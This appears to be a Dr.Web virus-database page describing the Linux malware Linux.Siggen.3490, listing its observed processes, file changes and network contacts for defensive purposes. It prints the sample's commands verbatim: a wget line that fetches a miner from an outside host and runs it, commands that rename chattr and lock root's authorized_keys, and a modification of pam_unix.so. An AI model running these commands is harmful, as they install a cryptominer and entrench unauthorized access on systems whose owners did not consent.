JavaScript support is required for our site to be fully operational in your browser.
Linux.Siggen.3490
Added to the Dr.Web virus database:
2020-12-22
Virus description added:
2020-12-22
Technical Information
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
/root/.ssh/authorized_keys
Launches processes:
sh -c /bin/mv /usr/bin/chattr /usr/bin/t
/bin/mv /usr/bin/chattr /usr/bin/t
sh -c /usr/bin/t +i /root/.ssh/authorized_keys
/usr/bin/t +i /root/.ssh/authorized_keys
sh -c wget -c http://a.powerofwish.com/miner2 -O /tmp/miner2 && chmod 755 /tmp/miner2 && /tmp/miner2
wget -c http://a.powerofwish.com/miner2 -O /tmp/miner2
chmod 755 /tmp/miner2
/tmp/miner2
Performs operations with the file system:
Modifies file access rights:
Creates folders:
Creates or modifies files:
/lib/x86_64-linux-gnu/security/pam_unix.so
/usr/bin/chattr
/tmp/miner2
/var/run/bioset
/run/bioset
Network activity:
Awaits incoming connections on ports:
Establishes connection:
<LOCAL_DNS_SERVER>
10#.#7.128.57:0
17#.##.210.251:0
10#.#7.129.57:0
[2#######0:3036::ac43:d2fb]:0
[2#######0:3035::681b:8139]:0
[2#######0:3036::681b:8039]:0
10#.##8.88.137:3333
HTTP GET requests:
DNS ASK:
a.####rofwish.com
su###.#puminerpool.com
Sends data to the following servers:
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK